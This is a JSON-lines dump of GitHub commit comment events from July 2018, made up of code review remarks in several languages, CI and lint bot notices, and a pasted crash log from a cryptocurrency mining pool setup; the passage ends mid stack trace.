{"id":"7928449087","type":"CommitCommentEvent","actor":{"login":"xorJane"},"repo":{"name":"JuliaLang/julialang.github.com"},"payload":{"comment":{"id":29620196,"position":7,"line":10,"path":"learning/index.md","commit_id":"5f14ecb843361fcd61b23687f7cbb30a54c67c2a","created_at":"2018-07-06T11:44:54Z","updated_at":"2018-07-06T11:44:54Z","author_association":"COLLABORATOR","body":"Good catch. Thank you!"}},"created_at":"2018-07-06T11:44:54Z"}
{"id":"7928451227","type":"CommitCommentEvent","actor":{"login":"Wqrld"},"repo":{"name":"Wqrld/mopidy-to-rgb-matrix"},"payload":{"comment":{"id":29620201,"position":null,"line":null,"path":null,"commit_id":"cb180507b7ff1c4552af3df9671c47657dbedc83","created_at":"2018-07-06T11:45:24Z","updated_at":"2018-07-06T11:45:24Z","author_association":"OWNER","body":"add multiple modes"}},"created_at":"2018-07-06T11:45:24Z"}
{"id":"7928451384","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29620202,"position":29,"line":1228,"path":"sys/dev/xen/blkfront/blkfront.c","commit_id":"610047bc55551d8c4cf8272db14e8754a855dfe6","created_at":"2018-07-06T11:45:27Z","updated_at":"2018-07-06T11:45:27Z","author_association":"OWNER","body":"How do I do that? Simply keep indirect segments as NULL, and break out of the loop (like it was done before, when `gnttab_grant_foreign_access()` failed)?"}},"created_at":"2018-07-06T11:45:27Z"}
{"id":"7928455247","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18019/programming-term2"},"payload":{"comment":{"id":29620211,"position":null,"line":null,"path":null,"commit_id":"79399ecee930289117dfb140c9f1e04006ecd88f","created_at":"2018-07-06T11:46:23Z","updated_at":"2018-07-06T11:46:23Z","author_association":"NONE","body":"計算の過程と結果は正しいので一旦OKですが、改善要望を下記に記載します。\r\n\r\n・出題文中の値はそれぞれを別々の変数に格納してほしいです。下記の値が対象です。\r\n　(各商品の単価、数量、焼鳥の割引率、値引きポイント)\r\n\r\n次回講義時に模範解答は発表しますが、時間があれば修正してみてください。\r\n\r\n余談ですが、将来仕事でコードをかく場合は変数名に含めるワードを下記のようにすると\r\n良いです。\r\n・ビール：beer\r\n・食べ物(おつまみ)：food"}},"created_at":"2018-07-06T11:46:23Z"}
{"id":"7928458856","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620222,"position":60,"line":60,"path":"fetchfilmsbonus/FilmsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:47:17Z","updated_at":"2018-07-06T11:47:17Z","author_association":"NONE","body":"Старайся не передавай лишних данных через пропы. Например, тут не было необходимости передавать целый `navigation` – ты могла создать метод `handlePushDetailsScreen` в App.js и передать сюда проп `onPushDetailsScreen`."}},"created_at":"2018-07-06T11:47:17Z"}
{"id":"7928459854","type":"CommitCommentEvent","actor":{"login":"yunarta"},"repo":{"name":"dennisweissmann/DeviceKit"},"payload":{"comment":{"id":29620226,"position":null,"line":null,"path":null,"commit_id":"26c8721dadb2c50b24ad859d6728f32f12ec2f53","created_at":"2018-07-06T11:47:31Z","updated_at":"2018-07-06T11:47:31Z","author_association":"NONE","body":"In my case, i have an unstable integration automation which purposely point to master of each pod source to detect early incompatibility with our own private pods mainly.\r\n\r\nCurrently it checks with all pod, thus i see the problem. Production wise i dont have issue."}},"created_at":"2018-07-06T11:47:31Z"}
{"id":"7928459858","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620227,"position":20,"line":20,"path":"fetchfilmsbonus/FilmsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:47:31Z","updated_at":"2018-07-06T11:47:31Z","author_association":"NONE","body":"Это поле не используется вроде."}},"created_at":"2018-07-06T11:47:31Z"}
{"id":"7928461560","type":"CommitCommentEvent","actor":{"login":"monotek"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29620235,"position":14,"line":32,"path":".gitignore","commit_id":"aeb5dbc4b1e65592a6cfa1033dabb928a7dfca1f","created_at":"2018-07-06T11:47:58Z","updated_at":"2018-07-06T11:47:58Z","author_association":"COLLABORATOR","body":"why is this removed?\r\n"}},"created_at":"2018-07-06T11:47:58Z"}
{"id":"7928461978","type":"CommitCommentEvent","actor":{"login":"rkaw92"},"repo":{"name":"bdlee-1/ssh2-sftp-client"},"payload":{"comment":{"id":29620238,"position":21,"line":132,"path":"src/index.js","commit_id":"fb259380723ca5d4990f1fb02ea7eddaccc5ef34","created_at":"2018-07-06T11:48:04Z","updated_at":"2018-07-06T11:48:04Z","author_association":"NONE","body":"Are you missing an encoding conversion step? It looks like it should work for Buffers (`binary` encoding), but what if the user has passed an encoding option? They will be expecting a `string` from the promise. Both cases (binary and string) should be handled."}},"created_at":"2018-07-06T11:48:04Z"}
{"id":"7928463428","type":"CommitCommentEvent","actor":{"login":"pmcphilwalsh"},"repo":{"name":"pmcphilwalsh/myweb"},"payload":{"comment":{"id":29620240,"position":6,"line":6,"path":"README.md","commit_id":"5360486b75a7afeffdab2306ff4d04b9cbed587f","created_at":"2018-07-06T11:48:25Z","updated_at":"2018-07-06T11:48:25Z","author_association":"OWNER","body":"## why delete this line?"}},"created_at":"2018-07-06T11:48:25Z"}
{"id":"7928464945","type":"CommitCommentEvent","actor":{"login":"pmcphilwalsh"},"repo":{"name":"pmcphilwalsh/myweb"},"payload":{"comment":{"id":29620242,"position":null,"line":null,"path":null,"commit_id":"5360486b75a7afeffdab2306ff4d04b9cbed587f","created_at":"2018-07-06T11:48:47Z","updated_at":"2018-07-06T11:48:47Z","author_association":"OWNER","body":"i need more info  - please"}},"created_at":"2018-07-06T11:48:47Z"}
{"id":"7928466171","type":"CommitCommentEvent","actor":{"login":"Mkohm"},"repo":{"name":"GlobalDigitalLibraryio/gdl-frontend"},"payload":{"comment":{"id":29620244,"position":null,"line":null,"path":null,"commit_id":"9d431df956d6c35bca79fb0f29b2aad4ae014a6a","created_at":"2018-07-06T11:49:06Z","updated_at":"2018-07-06T11:49:06Z","author_association":"CONTRIBUTOR","body":"Merge this into master when the Edit Book form is merged into master"}},"created_at":"2018-07-06T11:49:06Z"}
{"id":"7928470295","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18020/programming-term2"},"payload":{"comment":{"id":29620255,"position":null,"line":null,"path":null,"commit_id":"59978db452330202ab5b8c950d5be877b58e4115","created_at":"2018-07-06T11:50:07Z","updated_at":"2018-07-06T11:50:07Z","author_association":"NONE","body":"出題意図に沿った綺麗なコードで、書き方も大変見やすくて良いですね。\r\nもちろん結果も正解です。\r\n\r\nあえて改善点を上げるとすると、\r\n「焼き鳥の割引数」を「焼き鳥の割引率」にすると、説明として正しくなります。"}},"created_at":"2018-07-06T11:50:07Z"}
{"id":"7928473874","type":"CommitCommentEvent","actor":{"login":"SheelaRavi"},"repo":{"name":"SheelaRavi/git-github"},"payload":{"comment":{"id":29620262,"position":4,"line":2,"path":"README.md","commit_id":"9dbd1ebae5d5b990471944aee1ac59398e580486","created_at":"2018-07-06T11:51:00Z","updated_at":"2018-07-06T11:51:00Z","author_association":"OWNER","body":"this is for tutorial purpose"}},"created_at":"2018-07-06T11:51:00Z"}
{"id":"7928476833","type":"CommitCommentEvent","actor":{"login":"akkomar"},"repo":{"name":"mozilla/telemetry-streaming"},"payload":{"comment":{"id":29620265,"position":35,"line":35,"path":"src/main/scala/com/mozilla/telemetry/sinks/BatchHttpSink.scala","commit_id":"ff25b64338f6595e3512d363de3c9632354764ad","created_at":"2018-07-06T11:51:46Z","updated_at":"2018-07-06T11:51:46Z","author_association":"CONTRIBUTOR","body":"It might be worthwhile to limit the size of `batchCalls` buffer (and flush from `process` if we hit max) - Influx might have some limits on request sizes."}},"created_at":"2018-07-06T11:51:46Z"}
{"id":"7928477446","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29620266,"position":139,"line":3319,"path":"yarn.lock","commit_id":"883795a867d681dbea8756649c7fe8c84fca44de","created_at":"2018-07-06T11:51:55Z","updated_at":"2018-07-06T11:51:55Z","author_association":"MEMBER","body":"`lru-cache` seems to be listed twice here..."}},"created_at":"2018-07-06T11:51:55Z"}
{"id":"7928478125","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29620267,"position":null,"line":null,"path":null,"commit_id":"269ac0b7be5edb8f6ef59a45c1133050eb5f6bbc","created_at":"2018-07-06T11:52:06Z","updated_at":"2018-07-06T11:52:06Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 684](https://travis-ci.org/per1234/arduino-ci-script/builds/400846793) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00684-001-tsv"}},"created_at":"2018-07-06T11:52:06Z"}
{"id":"7928478519","type":"CommitCommentEvent","actor":{"login":"benjaoming"},"repo":{"name":"learningequality/kolibri"},"payload":{"comment":{"id":29620271,"position":172,"line":4349,"path":"yarn.lock","commit_id":"883795a867d681dbea8756649c7fe8c84fca44de","created_at":"2018-07-06T11:52:11Z","updated_at":"2018-07-06T11:52:11Z","author_association":"MEMBER","body":"`postcss` is also listed twice..."}},"created_at":"2018-07-06T11:52:11Z"}
{"id":"7928478556","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29620272,"position":null,"line":null,"path":null,"commit_id":"269ac0b7be5edb8f6ef59a45c1133050eb5f6bbc","created_at":"2018-07-06T11:52:12Z","updated_at":"2018-07-06T11:52:12Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 684](https://travis-ci.org/per1234/arduino-ci-script/builds/400846793) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00684"}},"created_at":"2018-07-06T11:52:12Z"}
{"id":"7928479444","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29620273,"position":null,"line":null,"path":null,"commit_id":"f9d28635e1143a9637c9d8f27d247ca9287c17f3","created_at":"2018-07-06T11:52:25Z","updated_at":"2018-07-06T11:52:25Z","author_association":"NONE","body":"[tests/testthat/test-generate.R:403:1:](https://github.com/ropensci/drake/blob/f9d28635e1143a9637c9d8f27d247ca9287c17f3/tests/testthat/test-generate.R#L403) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-06T11:52:25Z"}
{"id":"7928483819","type":"CommitCommentEvent","actor":{"login":"soywiz"},"repo":{"name":"ktorio/ktorio.github.io"},"payload":{"comment":{"id":29620280,"position":11,"line":11,"path":"servers/configuration/environments.md","commit_id":"d3abbbfeb5b42b2372c5176c28efe7d43f686286","created_at":"2018-07-06T11:53:29Z","updated_at":"2018-07-06T11:53:29Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-06T11:53:29Z"}
{"id":"7928486023","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29620287,"position":null,"line":null,"path":null,"commit_id":"b48f169a40bd467619304a3ef564a421435aa852","created_at":"2018-07-06T11:54:03Z","updated_at":"2018-07-06T11:54:03Z","author_association":"NONE","body":"#6598-FanSystemModel-crashes-using-Continuous-speed-control-method (rraustad) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b48f169a40bd467619304a3ef564a421435aa852-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-06T11:54:03Z"}
{"id":"7928486257","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/drake"},"payload":{"comment":{"id":29620289,"position":null,"line":null,"path":null,"commit_id":"018dfd13ff86769706210af2f28bea5ebc48ad2a","created_at":"2018-07-06T11:54:07Z","updated_at":"2018-07-06T11:54:07Z","author_association":"NONE","body":"[tests/testthat/test-generate.R:402:1:](https://github.com/ropensci/drake/blob/018dfd13ff86769706210af2f28bea5ebc48ad2a/tests/testthat/test-generate.R#L402) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```"}},"created_at":"2018-07-06T11:54:07Z"}
{"id":"7928486347","type":"CommitCommentEvent","actor":{"login":"kurtik40"},"repo":{"name":"kurtik40/Kunstmaan"},"payload":{"comment":{"id":29620290,"position":null,"line":null,"path":null,"commit_id":"6ca9c94c644d17d29477ab6868dc772174ac68c6","created_at":"2018-07-06T11:54:09Z","updated_at":"2018-07-06T11:54:09Z","author_association":"OWNER","body":"Back-end with database"}},"created_at":"2018-07-06T11:54:09Z"}
{"id":"7928492128","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620309,"position":32,"line":32,"path":"fetchfilmsbonus/DetailsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:55:34Z","updated_at":"2018-07-06T11:55:34Z","author_association":"NONE","body":"Не стоило передавать целый проп `navigation` сюда – было бы достаточно передать просто два пропа `movie` и `set`. Этот принцип называется [Law of Demeter](https://en.wikipedia.org/wiki/Law_of_Demeter).\r\n\r\n"}},"created_at":"2018-07-06T11:55:34Z"}
{"id":"7928493302","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620311,"position":60,"line":60,"path":"fetchfilmsbonus/FilmsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:55:51Z","updated_at":"2018-07-06T11:55:51Z","author_association":"NONE","body":"Как я выше сказал, это тот же Law of Demeter."}},"created_at":"2018-07-06T11:55:51Z"}
{"id":"7928500541","type":"CommitCommentEvent","actor":{"login":"jwashington104"},"repo":{"name":"CachetHQ/Docker"},"payload":{"comment":{"id":29620329,"position":null,"line":null,"path":null,"commit_id":"02025a70ff267972054e28c2818cde446bb98e48","created_at":"2018-07-06T11:57:39Z","updated_at":"2018-07-06T11:57:39Z","author_association":"NONE","body":"This commit actually breaks the docker build process when passing in comma seperated CIDR formats like so `192.168.1.1/32,192.168.3.50/32` etc."}},"created_at":"2018-07-06T11:57:39Z"}
{"id":"7928501611","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/n17r-works"},"payload":{"comment":{"id":29620331,"position":76,"line":76,"path":"fetchfilmsbonus/DetailsScreen.js","commit_id":"6e184daa1139cd47a44822aa104eeea0131afdfd","created_at":"2018-07-06T11:57:55Z","updated_at":"2018-07-06T11:57:55Z","author_association":"NONE","body":"Старайся не иметь в одном файле несколько компонентов – лучше выносить в отдельный файл."}},"created_at":"2018-07-06T11:57:55Z"}
{"id":"7928502076","type":"CommitCommentEvent","actor":{"login":"857487"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29620334,"position":null,"line":null,"path":null,"commit_id":"8730c9946d62745096b3f1feb87c7ddfb2300c7c","created_at":"2018-07-06T11:58:02Z","updated_at":"2018-07-06T11:58:02Z","author_association":"NONE","body":"RPC password was wrong before, now it is OK, but there is still a mistake.\r\n\r\n\r\n2018-07-06 19:55:57 [POSIX]\t[Connection Limit] (Safe to ignore) POSIX module not installed and resource (connection) limit was not raised\r\n2018-07-06 19:55:57 [Master]\t[CLI] CLI listening on port 17117\r\n2018-07-06 19:55:58 [Website]\t[Server] Website started on 0.0.0.0:88\r\n2018-07-06 19:55:58 [Switching]\t[Setup] (Thread 1) Loading last proxy state from redis\r\n2018-07-06 19:55:58 [Pool]\t[bitcoinx] (Thread 1) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:55:58 [Switching]\t[Setup] (Thread 2) Loading last proxy state from redis\r\n2018-07-06 19:55:58 [Pool]\t[bitcoinx] (Thread 2) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:55:59 [Switching]\t[Setup] (Thread 3) Loading last proxy state from redis\r\n2018-07-06 19:55:59 [Pool]\t[bitcoinx] (Thread 3) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:55:59 [Switching]\t[Setup] (Thread 4) Loading last proxy state from redis\r\n2018-07-06 19:55:59 [Pool]\t[bitcoinx] (Thread 4) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:55:59 [Switching]\t[Setup] (Thread 5) Loading last proxy state from redis\r\n2018-07-06 19:55:59 [Pool]\t[bitcoinx] (Thread 5) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:55:59 [Switching]\t[Setup] (Thread 6) Loading last proxy state from redis\r\n2018-07-06 19:55:59 [Pool]\t[bitcoinx] (Thread 6) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 1 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 0 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 4 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 2 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 5 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 3 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Switching]\t[Setup] (Thread 7) Loading last proxy state from redis\r\n2018-07-06 19:56:00 [Pool]\t[bitcoinx] (Thread 7) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 6 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Switching]\t[Setup] (Thread 8) Loading last proxy state from redis\r\n2018-07-06 19:56:00 [Pool]\t[bitcoinx] (Thread 8) Share processing setup with redis (127.0.0.1:6379)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Spawned 1 pool(s) on 10 thread(s)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 7 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Switching]\t[Setup] (Thread 9) Loading last proxy state from redis\r\n2018-07-06 19:56:00 [Pool]\t[bitcoinx] (Thread 9) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at Object.exports.uint256BufferFromHash (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/util.js:54:19)\r\n    at Object.exports.CreateGeneration (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/transactions.js:228:14)\r\n    at new BlockTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/blockTemplate.js:68:47)\r\n    at JobManager.processTemplate (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/jobManager.js:158:32)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/pool.js:577:62\r\n    at itemFinished (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:156:36)\r\n    at /root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:169:17\r\n    at parseJson (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:85:17)\r\n    at IncomingMessage.<anonymous> (/root/pool/nomp_globaltoken/node_modules/stratum-pool/lib/daemon.js:95:17)\r\n2018-07-06 19:56:00 [Master]\t[PoolSpawner] Fork 8 died, spawning replacement worker...\r\n2018-07-06 19:56:00 [Switching]\t[Setup] (Thread 10) Loading last proxy state from redis\r\n2018-07-06 19:56:00 [Pool]\t[bitcoinx] (Thread 10) Share processing setup with redis (127.0.0.1:6379)\r\nbuffer.js:152\r\n      throw new Error(\r\n      ^\r\n\r\nError: If encoding is specified then the first argument must be a string\r\n    at new Buffer (buffer.js:152:13)\r\n    at 